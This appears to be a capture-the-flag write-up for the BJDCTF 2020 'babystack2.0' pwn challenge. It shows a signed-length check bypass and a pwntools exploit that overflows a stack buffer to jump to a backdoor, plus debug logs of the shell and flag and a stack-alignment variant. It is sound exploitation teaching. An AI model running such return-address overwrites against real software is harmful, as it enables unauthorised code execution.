[BJDCTF 2020]babystack2.0



桌面$ checksec pwn
[*] '/home/pwn/桌面/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

IDA

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[12]; // [rsp+0h] [rbp-10h] BYREF
  size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF

  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf("%d", &nbytes);
  if ( (int)nbytes > 10 )
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  puts("[+]What's u name?");
  read(0, buf, (unsigned int)nbytes);
  return 0;
}
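The decompiled main above rejects any length greater than 10 with a signed comparison, but then hands the same value to read() as an unsigned int, so a negative length passes the check and becomes a huge read size. The following C snippet is an added example (it is not part of the original writeup and not the challenge binary's code): it puts that check beside a hardened version and evaluates both on constructed inputs. BUF_SIZE, MAX_NAME and the helper names are my own.

```c
#include <stdio.h>
#include <stddef.h>

#define BUF_SIZE 12   /* char buf[12] in the decompiled main */
#define MAX_NAME 10   /* the limit the program intends to enforce */

/* Same logic as the decompiled main: a signed comparison guards a value
 * that is afterwards handed to read() as unsigned int.
 * Returns the length read() would receive, or 0 if the check rejects it. */
size_t vulnerable_length(int nbytes)
{
    if (nbytes > 10)             /* -1 > 10 is false, so -1 slips through */
        return 0;
    return (unsigned int)nbytes; /* -1 is reinterpreted as 0xffffffff */
}

/* Hardened check: reject negative values and bound by the real buffer size. */
size_t hardened_length(int nbytes)
{
    if (nbytes < 0 || nbytes > MAX_NAME)
        return 0;
    return (size_t)nbytes;       /* now guaranteed to be at most 10 < BUF_SIZE */
}

/* True if a read() of this many bytes into buf[BUF_SIZE] would run past the
 * buffer, i.e. into the saved rbp and return address stored above it. */
int would_overflow(size_t len)
{
    return len > BUF_SIZE;
}

int main(void)
{
    /* constructed inputs: two legitimate lengths, one too long, and the -1 case */
    int inputs[] = { 5, 10, 11, -1 };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        size_t v = vulnerable_length(inputs[i]);
        size_t h = hardened_length(inputs[i]);
        printf("input %3d: vulnerable -> %10zu (%s), hardened -> %2zu (%s)\n",
               inputs[i],
               v, would_overflow(v) ? "overflow" : "ok",
               h, would_overflow(h) ? "overflow" : "ok");
    }
    return 0;
}
```

The fix is the extra `nbytes < 0` test (or, equivalently, comparing as an unsigned value against the buffer size); rejecting only values above 10 leaves every negative input accepted.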

EXP

from pwn import *
io = remote('node4.anna.nssctf.cn',28593)
context(log_level = "debug", arch = "amd64")
#io = process("./pwn")
backdoor = 0x0400726
# buf is at rbp-0x10: 0x10 bytes of buf, 8 bytes of saved rbp, then the return address
payload = b'a' * 0x18 + p64(backdoor)

# -1 passes the signed check `(int)nbytes > 10` but is 0xffffffff when read() receives it
io.sendlineafter('name:\n','-1')
io.sendlineafter('name?\n',payload)
io.interactive()

ERROR

error1

Note the following two lines: the '\n' must be appended to the pattern, because puts appends a '\n' after the string it prints.

io.sendlineafter('name:\n','-1')
io.sendlineafter('name?\n',payload)

Test results:

1. With '\n' appended

io.sendlineafter('name:\n','-1')
io.sendlineafter('name?\n',payload)
桌面$ python2 exp.py
[+] Opening connection to node4.anna.nssctf.cn on port 28593: Done
[DEBUG] Received 0x22 bytes:
    '*' * 0x22
[DEBUG] Received 0xc6 bytes:
    '\n'
    '*     Welcome to the BJDCTF!     *\n'
    '* And Welcome to the bin world!  *\n'
    "*  Let's try to pwn the world!   *\n"
    '* Please told me u answer loudly!*\n'
    '[+]Are u ready?\n'
    '[+]Please input the length of your name:\n'
[DEBUG] Sent 0x3 bytes:
    '-1\n'
[DEBUG] Received 0x11 bytes:
    "[+]What's u name?"
[DEBUG] Received 0x1 bytes:
    '\n'
[DEBUG] Sent 0x21 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    00000010  61 61 61 61  61 61 61 61  26 07 40 00  00 00 00 00  │aaaa│aaaa│&·@·│····│
    00000020  0a                                                  │·│
    00000021
[*] Switching to interactive mode
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x2d bytes:
    'NSSCTF{68536767-5f94-4f47-b532-c8b41c73b680}\n'
NSSCTF{68536767-5f94-4f47-b532-c8b41c73b680}

2. Without '\n'

io.sendlineafter('name:','-1')
io.sendlineafter('name?',payload)
桌面$ python2 exp.py
[+] Opening connection to node4.anna.nssctf.cn on port 28593: Done
[DEBUG] Received 0x22 bytes:
    '*' * 0x22
[DEBUG] Received 0xc6 bytes:
    '\n'
    '*     Welcome to the BJDCTF!     *\n'
    '* And Welcome to the bin world!  *\n'
    "*  Let's try to pwn the world!   *\n"
    '* Please told me u answer loudly!*\n'
    '[+]Are u ready?\n'
    '[+]Please input the length of your name:\n'
[DEBUG] Sent 0x3 bytes:
    '-1\n'
[DEBUG] Received 0x11 bytes:
    "[+]What's u name?"
[DEBUG] Sent 0x21 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    00000010  61 61 61 61  61 61 61 61  26 07 40 00  00 00 00 00  │aaaa│aaaa│&·@·│····│
    00000020  0a                                                  │·│
    00000021
[*] Switching to interactive mode
[DEBUG] Received 0x1 bytes:
    '\n'
                                            <= one extra blank line here: the '\n' emitted by puts
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x2d bytes:
    'NSSCTF{68536767-5f94-4f47-b532-c8b41c73b680}\n'
NSSCTF{68536767-5f94-4f47-b532-c8b41c73b680}

3. Any other combination (one pattern with '\n', the other without) may raise an error

io.sendlineafter('name:','-1')
io.sendlineafter('name?\n',payload)
io.sendlineafter('name:\n','-1')
io.sendlineafter('name?',payload)

error2

Note that the challenge runs on Ubuntu 16. If your local machine is Ubuntu 18 and you debug the pwn binary locally, you have to align the stack (insert a ret gadget before the backdoor address), otherwise it crashes.

Modified exp:

from pwn import *
#io = remote('node4.anna.nssctf.cn',28593)
context(log_level = "debug", arch = "amd64")
io = process("./pwn")
backdoor = 0x0400726
ret = 0x400827   # single `ret` gadget, used only to realign the stack
# payload = b'a' * 0x18 + p64(backdoor)
# the extra ret shifts rsp by 8 so the stack is 16-byte aligned when backdoor runs (Ubuntu 18 libc)
payload = b'a' * 0x18 + p64(ret) + p64(backdoor)
io.sendlineafter('name:\n','-1')
io.sendlineafter('name?\n',payload)
io.interactive()